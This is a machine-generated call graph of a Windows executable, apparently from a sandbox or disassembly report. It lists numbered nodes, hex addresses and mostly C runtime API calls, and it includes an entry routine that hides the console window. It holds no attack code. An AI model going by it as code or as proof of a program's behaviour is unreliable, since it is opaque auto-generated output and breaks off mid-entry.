std::_Throw_Cpp_error 29 API calls 21249->21250 21252 341725 21250->21252 21251 341750 103 API calls 21251->21253 21254 341ea0 29 API calls 21252->21254 21253->21248 21253->21249 21253->21251 21255 341d10 75 API calls 21253->21255 21255->21253 21257 341e63 _Fputc 21256->21257 21262 353558 21257->21262 21259 341e7c 21260 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21259->21260 21261 341e8c 21260->21261 21261->21253 21263 35356c _Fputc 21262->21263 21264 35358e 21263->21264 21266 3535b5 21263->21266 21265 357f78 _Fputc 29 API calls 21264->21265 21268 3535a9 _Fputc 21265->21268 21269 354d0d 21266->21269 21268->21259 21270 354d19 ___scrt_is_nonwritable_in_current_image 21269->21270 21277 353315 EnterCriticalSection 21270->21277 21272 354d27 21278 3546e2 21272->21278 21277->21272 21292 35e68b 21278->21292 21280 354709 21299 353b31 21280->21299 21287 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21288 35477c 21287->21288 21289 354d5c 21288->21289 21794 353329 LeaveCriticalSection 21289->21794 21291 354d45 21291->21268 21322 35e736 21292->21322 21294 35e69c _Fputc 21298 35e6fe 21294->21298 21329 35bf11 21294->21329 21297 35bed7 ___free_lconv_mon 14 API calls 21297->21298 21298->21280 21345 353a93 21299->21345 21302 353b57 21303 357f78 _Fputc 29 API calls 21302->21303 21304 353b74 21303->21304 21315 353861 21304->21315 21307 353790 _Fputc 39 API calls 21310 353b7f std::_Locinfo::_Locinfo_dtor 21307->21310 21309 3539f2 66 API calls 21309->21310 21310->21304 21310->21307 21310->21309 21311 353d73 21310->21311 21351 353de1 21310->21351 21354 353e59 21310->21354 21394 353fb2 21310->21394 21312 357f78 _Fputc 29 API calls 21311->21312 21313 353d8d 21312->21313 21314 357f78 _Fputc 29 API calls 21313->21314 21314->21304 21316 35bed7 ___free_lconv_mon 14 API calls 21315->21316 21317 353871 21316->21317 21318 35e774 21317->21318 21319 35476a 21318->21319 21320 35e77f 21318->21320 21319->21287 21320->21319 21688 3585b8 21320->21688 21323 35e742 _Fputc 21322->21323 21324 35e76c 21323->21324 21325 35f704 __fread_nolock 29 API calls 21323->21325 21324->21294 21326 35e75d 21325->21326 21336 36744f 21326->21336 21328 35e763 21328->21294 21330 35bf4f 21329->21330 21334 35bf1f __Getctype 21329->21334 21331 3576e4 __Wcrtomb 14 API calls 21330->21331 21333 35bf4d 21331->21333 21332 35bf3a RtlAllocateHeap 21332->21333 21332->21334 21333->21297 21334->21330 21334->21332 21335 355877 codecvt 2 API calls 21334->21335 21335->21334 21337 36745c 21336->21337 21338 367469 21336->21338 21339 3576e4 __Wcrtomb 14 API calls 21337->21339 21341 367475 21338->21341 21342 3576e4 __Wcrtomb 14 API calls 21338->21342 21340 367461 21339->21340 21340->21328 21341->21328 21343 367496 21342->21343 21344 357dcf __strnicoll 29 API calls 21343->21344 21344->21340 21346 353ac0 21345->21346 21347 353a9e 21345->21347 21429 3535fc 21346->21429 21348 357f78 _Fputc 29 API calls 21347->21348 21350 353ab9 21348->21350 21350->21302 21350->21304 21350->21310 21437 354dda 21351->21437 21353 353e1c 21353->21310 21355 353e77 21354->21355 21356 353e60 21354->21356 21359 357f78 _Fputc 29 API calls 21355->21359 21369 353eb6 21355->21369 21357 353fd6 21356->21357 21358 354042 21356->21358 21356->21369 21362 353fdc 21357->21362 21363 35406a 21357->21363 21360 354047 21358->21360 21361 354081 21358->21361 21364 353eab 21359->21364 21365 354049 21360->21365 21366 354078 21360->21366 21367 354086 21361->21367 21368 3540a0 21361->21368 21375 354037 21362->21375 21376 353fe1 21362->21376 21485 354b80 21363->21485 21364->21310 21372 353ff0 21365->21372 21380 354058 21365->21380 21492 3545ef 21366->21492 21367->21363 21367->21375 21388 354009 21367->21388 21496 35460c 21368->21496 21369->21310 21377 3540ab 21372->21377 21460 35445e 21372->21460 21375->21377 21474 354866 21375->21474 21376->21372 21378 35401c 21376->21378 21376->21388 21383 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21377->21383 21378->21377 21470 3542f4 21378->21470 21380->21363 21382 35405c 21380->21382 21382->21377 21481 354622 21382->21481 21384 3542f2 21383->21384 21384->21310 21387 3541ac 21390 353acb 66 API calls 21387->21390 21392 35421f 21387->21392 21388->21377 21388->21387 21499 353acb 21388->21499 21389 354284 21389->21377 21393 353acb 66 API calls 21389->21393 21390->21387 21392->21389 21503 35f430 21392->21503 21393->21389 21395 353fd6 21394->21395 21396 354042 21394->21396 21399 353fdc 21395->21399 21400 35406a 21395->21400 21397 354047 21396->21397 21398 354081 21396->21398 21401 354049 21397->21401 21402 354078 21397->21402 21403 354086 21398->21403 21404 3540a0 21398->21404 21410 354037 21399->21410 21411 353fe1 21399->21411 21408 354b80 30 API calls 21400->21408 21406 353ff0 21401->21406 21412 354058 21401->21412 21405 3545ef 30 API calls 21402->21405 21403->21400 21403->21410 21423 354009 21403->21423 21407 35460c 30 API calls 21404->21407 21405->21423 21409 35445e 42 API calls 21406->21409 21413 3540ab 21406->21413 21407->21423 21408->21423 21409->21423 21410->21413 21415 354866 30 API calls 21410->21415 21411->21406 21414 35401c 21411->21414 21411->21423 21412->21400 21416 35405c 21412->21416 21418 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21413->21418 21414->21413 21417 3542f4 41 API calls 21414->21417 21415->21423 21416->21413 21420 354622 29 API calls 21416->21420 21417->21423 21419 3542f2 21418->21419 21419->21310 21420->21423 21421 3541ac 21424 35421f 21421->21424 21425 353acb 66 API calls 21421->21425 21422 353acb 66 API calls 21422->21423 21423->21413 21423->21421 21423->21422 21426 35f430 _Fputc 41 API calls 21424->21426 21428 354284 21424->21428 21425->21421 21426->21424 21427 353acb 66 API calls 21427->21428 21428->21413 21428->21427 21430 353610 21429->21430 21431 35367a 21429->21431 21432 35f704 __fread_nolock 29 API calls 21430->21432 21431->21350 21433 353617 21432->21433 21433->21431 21434 3576e4 __Wcrtomb 14 API calls 21433->21434 21435 35366f 21434->21435 21436 357dcf __strnicoll 29 API calls 21435->21436 21436->21431 21447 354d68 21437->21447 21439 354e01 21441 357f78 _Fputc 29 API calls 21439->21441 21440 354dec 21440->21439 21443 354e34 21440->21443 21446 354e1c std::_Locinfo::_Locinfo_dtor 21440->21446 21441->21446 21442 354ecb 21444 354db1 29 API calls 21442->21444 21443->21442 21454 354db1 21443->21454 21444->21446 21446->21353 21448 354d80 21447->21448 21449 354d6d 21447->21449 21448->21440 21450 3576e4 __Wcrtomb 14 API calls 21449->21450 21451 354d72 21450->21451 21452 357dcf __strnicoll 29 API calls 21451->21452 21453 354d7d 21452->21453 21453->21440 21455 354dd6 21454->21455 21456 354dc2 21454->21456 21455->21442 21456->21455 21457 3576e4 __Wcrtomb 14 API calls 21456->21457 21458 354dcb 21457->21458 21459 357dcf __strnicoll 29 API calls 21458->21459 21459->21455 21461 354478 21460->21461 21513 35477e 21461->21513 21463 3544b7 21524 35e8ff 21463->21524 21466 353790 _Fputc 39 API calls 21467 35456e 21466->21467 21468 353790 _Fputc 39 API calls 21467->21468 21469 3545a1 21467->21469 21468->21469 21469->21388 21469->21469 21471 35430f 21470->21471 21472 354345 21471->21472 21473 35f430 _Fputc 41 API calls 21471->21473 21472->21388 21473->21472 21475 35487b 21474->21475 21476 35489d 21475->21476 21478 3548c4 21475->21478 21477 357f78 _Fputc 29 API calls 21476->21477 21480 3548ba 21477->21480 21479 35477e 15 API calls 21478->21479 21478->21480 21479->21480 21480->21388 21482 354638 21481->21482 21483 357f78 _Fputc 29 API calls 21482->21483 21484 354659 21482->21484 21483->21484 21484->21388 21486 354b95 21485->21486 21487 354bb7 21486->21487 21489 354bde 21486->21489 21488 357f78 _Fputc 29 API calls 21487->21488 21491 354bd4 21488->21491 21490 35477e 15 API calls 21489->21490 21489->21491 21490->21491 21491->21388 21493 3545fb 21492->21493 21681 3549f3 21493->21681 21495 35460b 21495->21388 21497 354866 30 API calls 21496->21497 21498 354621 21497->21498 21498->21388 21500 353add 21499->21500 21501 358c30 _Fputc 66 API calls 21500->21501 21502 353ae5 21500->21502 21501->21502 21502->21388 21504 35f445 21503->21504 21505 35f486 21504->21505 21507 353790 _Fputc 39 API calls 21504->21507 21510 35f449 __fread_nolock _Fputc 21504->21510 21512 35f472 __fread_nolock 21504->21512 21508 35c021 _Fputc WideCharToMultiByte 21505->21508 21505->21510 21505->21512 21506 357f78 _Fputc 29 API calls 21506->21510 21507->21505 21509 35f541 21508->21509 21509->21510 21511 35f557 GetLastError 21509->21511 21510->21392 21511->21510 21511->21512 21512->21506 21512->21510 21514 3547a5 21513->21514 21515 354793 21513->21515 21514->21515 21516 35bf11 __fread_nolock 15 API calls 21514->21516 21515->21463 21517 3547c9 21516->21517 21518 3547d1 21517->21518 21519 3547dc 21517->21519 21520 35bed7 ___free_lconv_mon 14 API calls 21518->21520 21543 35383d 21519->21543 21520->21515 21523 35bed7 ___free_lconv_mon 14 API calls 21523->21515 21525 35e934 21524->21525 21527 35e910 21524->21527 21525->21527 21528 35e967 21525->21528 21526 357f78 _Fputc 29 API calls 21538 35454a 21526->21538 21527->21526 21529 35e9cf 21528->21529 21531 35e9a0 21528->21531 21530 35e9fd 21529->21530 21532 35e9f8 21529->21532 21554 35ee76 21530->21554 21546 35eab4 21531->21546 21535 35ea25 21532->21535 21536 35ea5f 21532->21536 21539 35ea45 21535->21539 21540 35ea2a 21535->21540 21581 35ec9c 21536->21581 21538->21466 21538->21467 21574 35f291 21539->21574 21564 35f327 21540->21564 21544 35bed7 ___free_lconv_mon 14 API calls 21543->21544 21545 35384c 21544->21545 21545->21523 21547 35eaca 21546->21547 21548 35ead5 21546->21548 21547->21538 21588 35bb4c 21548->21588 21551 35eb3a 21551->21538 21552 357dfc __Getctype 11 API calls 21553 35eb48 21552->21553 21555 35ee89 21554->21555 21556 35ee98 21555->21556 21557 35eeba 21555->21557 21558 357f78 _Fputc 29 API calls 21556->21558 21559 35eecf 21557->21559 21561 35ef22 21557->21561 21563 35eeb0 __fread_nolock __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z _strrchr __allrem 21558->21563 21560 35ec9c 41 API calls 21559->21560 21560->21563 21562 353790 _Fputc 39 API calls 21561->21562 21561->21563 21562->21563 21563->21538 21597 367792 21564->21597 21575 367792 31 API calls 21574->21575 21576 35f2c0 21575->21576 21577 3675e7 29 API calls 21576->21577 21578 35f301 21577->21578 21579 35f308 21578->21579 21580 35f1a3 39 API calls 21578->21580 21579->21538 21580->21579 21582 367792 31 API calls 21581->21582 21583 35ecc6 21582->21583 21584 3675e7 29 API calls 21583->21584 21585 35ed14 21584->21585 21586 35eb49 41 API calls 21585->21586 21587 35ed1b 21585->21587 21586->21587 21587->21538 21589 35bb68 21588->21589 21590 35bb5a 21588->21590 21591 3576e4 __Wcrtomb 14 API calls 21589->21591 21590->21589 21594 35bb80 21590->21594 21596 35bb70 21591->21596 21592 357dcf __strnicoll 29 API calls 21593 35bb7a 21592->21593 21593->21551 21593->21552 21594->21593 21595 3576e4 __Wcrtomb 14 API calls 21594->21595 21595->21596 21596->21592 21598 3677c6 21597->21598 21599 357343 29 API calls 21598->21599 21601 36782f 21599->21601 21600 36785b 21603 35bb4c ___std_exception_copy 29 API calls 21600->21603 21601->21600 21602 3678ed 21601->21602 21605 3678c8 21601->21605 21606 367888 21601->21606 21604 357343 29 API calls 21602->21604 21607 3678b8 21603->21607 21608 367917 21604->21608 21610 35bb4c ___std_exception_copy 29 API calls 21605->21610 21606->21600 21606->21602 21609 368d6d 21607->21609 21615 3678c3 21607->21615 21611 357343 29 API calls 21608->21611 21612 357dfc __Getctype 11 API calls 21609->21612 21610->21607 21613 36792a 21611->21613 21614 368d79 21612->21614 21618 36a4c0 21 API calls 21613->21618 21616 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21615->21616 21617 35f357 21616->21617 21653 3675e7 21617->21653 21619 3679a4 21618->21619 21620 36a660 __floor_pentium4 21 API calls 21619->21620 21621 3679ae 21620->21621 21622 367c0c 21621->21622 21626 367a4c 21621->21626 21631 367ca9 21621->21631 21622->21631 21654 3675f8 21653->21654 21656 36761a 21653->21656 21655 357f78 _Fputc 29 API calls 21654->21655 21658 367610 codecvt 21655->21658 21657 357f78 _Fputc 29 API calls 21656->21657 21656->21658 21657->21658 21682 354a08 21681->21682 21683 354a2a 21682->21683 21685 354a51 21682->21685 21684 357f78 _Fputc 29 API calls 21683->21684 21686 354a47 21684->21686 21685->21686 21687 35477e 15 API calls 21685->21687 21686->21495 21687->21686 21689 3585f8 21688->21689 21690 3585d1 21688->21690 21689->21319 21690->21689 21691 35f704 __fread_nolock 29 API calls 21690->21691 21692 3585ed 21691->21692 21694 363e10 21692->21694 21695 363e1c ___scrt_is_nonwritable_in_current_image 21694->21695 21696 363e5d 21695->21696 21698 363ea3 21695->21698 21704 363e24 21695->21704 21697 357f78 _Fputc 29 API calls 21696->21697 21697->21704 21705 363868 EnterCriticalSection 21698->21705 21700 363ea9 21701 363ec7 21700->21701 21706 363bf4 21700->21706 21734 363f19 21701->21734 21704->21689 21705->21700 21707 363c1c 21706->21707 21733 363c3f __fread_nolock 21706->21733 21708 363c20 21707->21708 21710 363c7b 21707->21710 21709 357f78 _Fputc 29 API calls 21708->21709 21709->21733 21711 363c99 21710->21711 21751 3629a2 21710->21751 21737 363f21 21711->21737 21715 363cb1 21719 363ce0 21715->21719 21720 363cb9 21715->21720 21716 363cf8 21717 363d61 WriteFile 21716->21717 21718 363d0c 21716->21718 21721 363d83 GetLastError 21717->21721 21732 363cf3 21717->21732 21723 363d14 21718->21723 21724 363d4d 21718->21724 21759 363f9e GetConsoleOutputCP 21719->21759 21720->21733 21754 364365 21720->21754 21721->21732 21725 363d39 21723->21725 21726 363d19 21723->21726 21744 3643cd 21724->21744 21779 364591 21725->21779 21729 363d22 21726->21729 21726->21733 21772 3644a8 21729->21772 21732->21733 21733->21701 21793 36388b LeaveCriticalSection 21734->21793 21736 363f1f 21736->21704 21738 36744f __fread_nolock 29 API calls 21737->21738 21741 363f33 21738->21741 21739 363cab 21739->21715 21739->21716 21740 363f61 21740->21739 21742 363f7b GetConsoleMode 21740->21742 21741->21739 21741->21740 21743 353790 _Fputc 39 API calls 21741->21743 21742->21739 21743->21740 21749 3643dc _Fputc 21744->21749 21745 36448d 21746 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21745->21746 21747 3644a6 21746->21747 21747->21733 21748 36444c WriteFile 21748->21749 21750 36448f GetLastError 21748->21750 21749->21745 21749->21748 21750->21745 21787 362b03 21751->21787 21753 3629bb 21753->21711 21755 3643bc 21754->21755 21756 364387 21754->21756 21755->21733 21756->21755 21757 3643be GetLastError 21756->21757 21758 36a2d1 5 API calls _Fputc 21756->21758 21757->21755 21758->21756 21760 364010 21759->21760 21764 364017 codecvt 21759->21764 21761 353790 _Fputc 39 API calls 21760->21761 21761->21764 21762 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21763 36435e 21762->21763 21763->21732 21765 35f5d1 40 API calls _Fputc 21764->21765 21766 368fd5 5 API calls std::_Locinfo::_Locinfo_dtor 21764->21766 21767 3642cd 21764->21767 21768 35c021 _Fputc WideCharToMultiByte 21764->21768 21769 364246 WriteFile 21764->21769 21771 364284 WriteFile 21764->21771 21765->21764 21766->21764 21767->21762 21767->21767 21768->21764 21769->21764 21770 36433c GetLastError 21769->21770 21770->21767 21771->21764 21771->21770 21773 3644b7 _Fputc 21772->21773 21774 364576 21773->21774 21776 36452c WriteFile 21773->21776 21775 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21774->21775 21777 36458f 21775->21777 21776->21773 21778 364578 GetLastError 21776->21778 21777->21733 21778->21774 21786 3645a0 _Fputc 21779->21786 21780 3646a8 21781 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 21780->21781 21782 3646c1 21781->21782 21782->21732 21783 35c021 _Fputc WideCharToMultiByte 21783->21786 21784 3646aa GetLastError 21784->21780 21785 36465f WriteFile 21785->21784 21785->21786 21786->21780 21786->21783 21786->21784 21786->21785 21788 36361f _Fputc 29 API calls 21787->21788 21789 362b15 21788->21789 21790 362b31 SetFilePointerEx 21789->21790 21792 362b1d __fread_nolock 21789->21792 21791 362b49 GetLastError 21790->21791 21790->21792 21791->21792 21792->21753 21793->21736 21794->21291 21795 350312 21796 35031e ___scrt_is_nonwritable_in_current_image 21795->21796 21821 34a8ca 21796->21821 21798 350325 21799 35047e 21798->21799 21808 35034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 21798->21808 21874 34f8e9 IsProcessorFeaturePresent 21799->21874 21801 350485 21856 355545 21801->21856 21804 35555b CallUnexpected 21 API calls 21805 350493 21804->21805 21806 35036e 21807 3503ef 21832 357abc 21807->21832 21808->21806 21808->21807 21859 35558f 21808->21859 21811 3503f5 21836 3424b0 GetConsoleWindow ShowWindow 21811->21836 21813 35040c 21814 34f896 CallUnexpected GetModuleHandleW 21813->21814 21815 350416 21814->21815 21815->21801 21816 35041a 21815->21816 21817 350423 21816->21817 21865 355571 21816->21865 21868 34a903 21817->21868 21822 34a8d3 21821->21822 21878 34f555 IsProcessorFeaturePresent 21822->21878 21826 34a8e4 21827 34a8e8 21826->21827 21888 353230 21826->21888 21827->21798 21830 34a8ff 21830->21798 21833 357ac5 21832->21833 21834 357aca 21832->21834 21960 357be5 21833->21960 21834->21811 21837 34a663 codecvt 3 API calls 21836->21837 21838 3424f3 21837->21838 22444 355349 21838->22444 21840 342513 21841 342554 21840->21841 21842 34251d 21840->21842 21845 34b317 std::_Throw_Cpp_error 30 API calls 21841->21845 21843 342524 GetCurrentThreadId 21842->21843 21844 34256c 21842->21844 21847 34257d 21843->21847 21848 34252d 21843->21848 21846 34b317 std::_Throw_Cpp_error 30 API calls 21844->21846 21845->21844 21846->21847 21849 34b317 std::_Throw_Cpp_error 30 API calls 21847->21849 22459 34f11d WaitForSingleObjectEx 21848->22459 21851 34258e 21849->21851 21854 34b317 std::_Throw_Cpp_error 30 API calls 21851->21854 21853 342541 21853->21813 21855 34259f 21854->21855 21855->21813 21857 355690 CallUnexpected 21 API calls 21856->21857 21858 35048b 21857->21858 21858->21804 21860 3555a5 ___scrt_is_nonwritable_in_current_image __Getctype 21859->21860 21860->21807 21861 35c16a __Getctype 39 API calls 21860->21861 21862 35a17c 21861->21862 21863 358353 CallUnexpected 39 API calls 21862->21863 21864 35a1a6 21863->21864 21866 355690 CallUnexpected 21 API calls 21865->21866 21867 35557c 21866->21867 21867->21817 21869 34a90f 21868->21869 21870 34a925 21869->21870 22521 353242 21869->22521 21870->21806 21872 34a91d 21873 350ce7 ___scrt_uninitialize_crt 7 API calls 21872->21873 21873->21870 21875 34f8ff __fread_nolock CallUnexpected 21874->21875 21876 34f9aa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21875->21876 21877 34f9ee CallUnexpected 21876->21877 21877->21801 21879 34a8df 21878->21879 21880 350cc8 21879->21880 21897 35bba6 21880->21897 21883 350cd1 21883->21826 21885 350cd9 21886 350ce4 21885->21886 21911 35bbe2 21885->21911 21886->21826 21951 35e2e9 21888->21951 21891 350ce7 21892 350cf0 21891->21892 21893 350cfa 21891->21893 21894 35acbe ___vcrt_uninitialize_ptd 6 API calls 21892->21894 21893->21827 21895 350cf5 21894->21895 21896 35bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21895->21896 21896->21893 21898 35bbaf 21897->21898 21900 35bbd8 21898->21900 21901 350ccd 21898->21901 21915 3668f9 21898->21915 21902 35bbe2 ___vcrt_uninitialize_locks DeleteCriticalSection 21900->21902 21901->21883 21903 35ac8b 21901->21903 21902->21901 21932 36680a 21903->21932 21906 35aca0 21906->21885 21909 35acbb 21909->21885 21912 35bc0c 21911->21912 21913 35bbed 21911->21913 21912->21883 21914 35bbf7 DeleteCriticalSection 21913->21914 21914->21912 21914->21914 21920 36698b 21915->21920 21918 366931 InitializeCriticalSectionAndSpinCount 21919 36691c 21918->21919 21919->21898 21921 3669ac 21920->21921 21922 366913 21920->21922 21921->21922 21924 366a14 GetProcAddress 21921->21924 21925 366a05 21921->21925 21927 366940 LoadLibraryExW 21921->21927 21922->21918 21922->21919 21924->21922 21925->21924 21926 366a0d FreeLibrary 21925->21926 21926->21924 21928 366957 GetLastError 21927->21928 21929 366987 21927->21929 21928->21929 21930 366962 ___vcrt_FlsGetValue 21928->21930 21929->21921 21930->21929 21931 366978 LoadLibraryExW 21930->21931 21931->21921 21933 36698b ___vcrt_FlsGetValue 5 API calls 21932->21933 21934 366824 21933->21934 21935 36683d TlsAlloc 21934->21935 21936 35ac95 21934->21936 21936->21906 21937 3668bb 21936->21937 21938 36698b ___vcrt_FlsGetValue 5 API calls 21937->21938 21939 3668d5 21938->21939 21940 35acae 21939->21940 21941 3668f0 TlsSetValue 21939->21941 21940->21909 21942 35acbe 21940->21942 21941->21940 21943 35acce 21942->21943 21944 35acc8 21942->21944 21943->21906 21946 366845 21944->21946 21947 36698b ___vcrt_FlsGetValue 5 API calls 21946->21947 21948 36685f 21947->21948 21949 366877 TlsFree 21948->21949 21950 36686b 21948->21950 21949->21950 21950->21943 21952 35e2f9 21951->21952 21953 34a8f1 21951->21953 21952->21953 21955 35da52 21952->21955 21953->21830 21953->21891 21956 35da59 21955->21956 21957 35da9c GetStdHandle 21956->21957 21958 35dafe 21956->21958 21959 35daaf GetFileType 21956->21959 21957->21956 21958->21952 21959->21956 21961 357c04 21960->21961 21962 357bee 21960->21962 21961->21834 21962->21961 21966 357b26 21962->21966 21964 357bfb 21964->21961 21983 357cf3 21964->21983 21967 357b32 21966->21967 21968 357b2f 21966->21968 21992 35db20 21967->21992 21968->21964 21973 357b43 21975 35bed7 ___free_lconv_mon 14 API calls 21973->21975 21974 357b4f 22019 357c11 21974->22019 21977 357b49 21975->21977 21977->21964 21979 35bed7 ___free_lconv_mon 14 API calls 21980 357b73 21979->21980 21981 35bed7 ___free_lconv_mon 14 API calls 21980->21981 21982 357b79 21981->21982 21982->21964 21984 357d64 21983->21984 21990 357d02 21983->21990 21984->21961 21985 35c021 WideCharToMultiByte _Fputc 21985->21990 21986 35d2b4 __Getctype 14 API calls 21986->21990 21987 357d68 21988 35bed7 ___free_lconv_mon 14 API calls 21987->21988 21988->21984 21990->21984 21990->21985 21990->21986 21990->21987 21991 35bed7 ___free_lconv_mon 14 API calls 21990->21991 22232 363295 21990->22232 21991->21990 21993 357b38 21992->21993 21994 35db29 21992->21994 21998 3631be GetEnvironmentStringsW 21993->21998 22041 35c225 21994->22041 21999 3631d6 21998->21999 22012 357b3d 21998->22012 22000 35c021 _Fputc WideCharToMultiByte 21999->22000 22001 3631f3 22000->22001 22002 3631fd FreeEnvironmentStringsW 22001->22002 22003 363208 22001->22003 22002->22012 22004 35bf11 __fread_nolock 15 API calls 22003->22004 22005 36320f 22004->22005 22006 363217 22005->22006 22007 363228 22005->22007 22008 35bed7 ___free_lconv_mon 14 API calls 22006->22008 22009 35c021 _Fputc WideCharToMultiByte 22007->22009 22010 36321c FreeEnvironmentStringsW 22008->22010 22011 363238 22009->22011 22010->22012 22013 363247 22011->22013 22014 36323f 22011->22014 22012->21973 22012->21974 22015 35bed7 ___free_lconv_mon 14 API calls 22013->22015 22016 35bed7 ___free_lconv_mon 14 API calls 22014->22016 22017 363245 FreeEnvironmentStringsW 22015->22017 22016->22017 22017->22012 22020 357c26 22019->22020 22021 35d2b4 __Getctype 14 API calls 22020->22021 22022 357c4d 22021->22022 22023 357c55 22022->22023 22029 357c5f 22022->22029 22024 35bed7 ___free_lconv_mon 14 API calls 22023->22024 22025 357b56 22024->22025 22025->21979 22026 357cbc 22027 35bed7 ___free_lconv_mon 14 API calls 22026->22027 22027->22025 22028 35d2b4 __Getctype 14 API calls 22028->22029 22029->22026 22029->22028 22030 357ccb 22029->22030 22032 35bb4c ___std_exception_copy 29 API calls 22029->22032 22035 357ce6 22029->22035 22037 35bed7 ___free_lconv_mon 14 API calls 22029->22037 22226 357bb6 22030->22226 22032->22029 22034 35bed7 ___free_lconv_mon 14 API calls 22036 357cd8 22034->22036 22038 357dfc __Getctype 11 API calls 22035->22038 22039 35bed7 ___free_lconv_mon 14 API calls 22036->22039 22037->22029 22040 357cf2 22038->22040 22039->22025 22042 35c230 22041->22042 22043 35c236 22041->22043 22045 35cb94 __Getctype 6 API calls 22042->22045 22044 35cbd3 __Getctype 6 API calls 22043->22044 22047 35c23c 22043->22047 22046 35c250 22044->22046 22045->22043 22046->22047 22048 35d2b4 __Getctype 14 API calls 22046->22048 22049 358353 CallUnexpected 39 API calls 22047->22049 22050 35c241 22047->22050 22051 35c260 22048->22051 22052 35c2ba 22049->22052 22066 35dee1 22050->22066 22053 35c27d 22051->22053 22054 35c268 22051->22054 22056 35cbd3 __Getctype 6 API calls 22053->22056 22055 35cbd3 __Getctype 6 API calls 22054->22055 22057 35c274 22055->22057 22058 35c289 22056->22058 22062 35bed7 ___free_lconv_mon 14 API calls 22057->22062 22059 35c28d 22058->22059 22060 35c29c 22058->22060 22063 35cbd3 __Getctype 6 API calls 22059->22063 22061 35c47c __Getctype 14 API calls 22060->22061 22064 35c2a7 22061->22064 22062->22047 22063->22057 22065 35bed7 ___free_lconv_mon 14 API calls 22064->22065 22065->22050 22067 35df0b 22066->22067 22088 35dd6d 22067->22088 22070 35df24 22070->21993 22071 35bf11 __fread_nolock 15 API calls 22072 35df35 22071->22072 22073 35df3d 22072->22073 22074 35df4b 22072->22074 22076 35bed7 ___free_lconv_mon 14 API calls 22073->22076 22095 35db68 22074->22095 22076->22070 22078 35df83 22079 3576e4 __Wcrtomb 14 API calls 22078->22079 22080 35df88 22079->22080 22083 35bed7 ___free_lconv_mon 14 API calls 22080->22083 22081 35dfca 22082 35e013 22081->22082 22106 35e29c 22081->22106 22086 35bed7 ___free_lconv_mon 14 API calls 22082->22086 22083->22070 22084 35df9e 22084->22081 22087 35bed7 ___free_lconv_mon 14 API calls 22084->22087 22086->22070 22087->22081 22114 35297a 22088->22114 22091 35dda0 22093 35ddb7 22091->22093 22094 35dda5 GetACP 22091->22094 22092 35dd8e GetOEMCP 22092->22093 22093->22070 22093->22071 22094->22093 22096 35dd6d 41 API calls 22095->22096 22097 35db88 22096->22097 22098 35dc8d 22097->22098 22100 35dbc5 IsValidCodePage 22097->22100 22105 35dbe0 __fread_nolock 22097->22105 22099 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22098->22099 22102 35dd6b 22099->22102 22100->22098 22101 35dbd7 22100->22101 22103 35dc00 GetCPInfo 22101->22103 22101->22105 22102->22078 22102->22084 22103->22098 22103->22105 22126 35e0f7 22105->22126 22107 35e2a8 ___scrt_is_nonwritable_in_current_image 22106->22107 22200 3580e1 EnterCriticalSection 22107->22200 22109 35e2b2 22201 35e036 22109->22201 22115 352991 22114->22115 22116 352998 22114->22116 22115->22091 22115->22092 22116->22115 22117 35c16a __Getctype 39 API calls 22116->22117 22118 3529b9 22117->22118 22119 35c74e __Getctype 39 API calls 22118->22119 22120 3529cf 22119->22120 22122 35c77b 22120->22122 22123 35c7a3 22122->22123 22124 35c78e 22122->22124 22123->22115 22124->22123 22125 35db02 __strnicoll 39 API calls 22124->22125 22125->22123 22127 35e11f GetCPInfo 22126->22127 22136 35e1e8 22126->22136 22132 35e137 22127->22132 22127->22136 22128 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22130 35e29a 22128->22130 22130->22098 22137 35d5a0 22132->22137 22136->22128 22138 35297a __strnicoll 39 API calls 22137->22138 22139 35d5c0 22138->22139 22157 35bf5f 22139->22157 22141 35d67c 22144 34a6e1 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 22141->22144 22142 35d674 22160 34fe0b 22142->22160 22143 35d5ed 22143->22141 22143->22142 22146 35bf11 __fread_nolock 15 API calls 22143->22146 22148 35d612 __fread_nolock __alloca_probe_16 22143->22148 22147 35d69f 22144->22147 22146->22148 22152 35d6a1 22147->22152 22148->22142 22149 35bf5f __fread_nolock MultiByteToWideChar 22148->22149 22150 35d65b 22149->22150 22150->22142 22151 35d662 GetStringTypeW 22150->22151 22151->22142 22164 35bf89 22157->22164 22161 34fe15 22160->22161 22162 34fe26 22160->22162 22161->22162 22163 3592d7 ___std_exception_destroy 14 API calls 22161->22163 22162->22141 22163->22162 22165 35bf7b MultiByteToWideChar 22164->22165 22165->22143 22200->22109 22211 358fc3 22201->22211 22203 35e058 22204 358fc3 __fread_nolock 29 API calls 22203->22204 22205 35e077 22204->22205 22212 358fd4 22211->22212 22221 358fd0 codecvt 22211->22221 22213 358fdb 22212->22213 22216 358fee __fread_nolock 22212->22216 22214 3576e4 __Wcrtomb 14 API calls 22213->22214 22215 358fe0 22214->22215 22218 359025 22216->22218 22219 35901c 22216->22219 22216->22221 22218->22221 22223 3576e4 __Wcrtomb 14 API calls 22218->22223 22220 3576e4 __Wcrtomb 14 API calls 22219->22220 22221->22203 22227 357bc3 22226->22227 22231 357be0 22226->22231 22228 357bda 22227->22228 22229 35bed7 ___free_lconv_mon 14 API calls 22227->22229 22230 35bed7 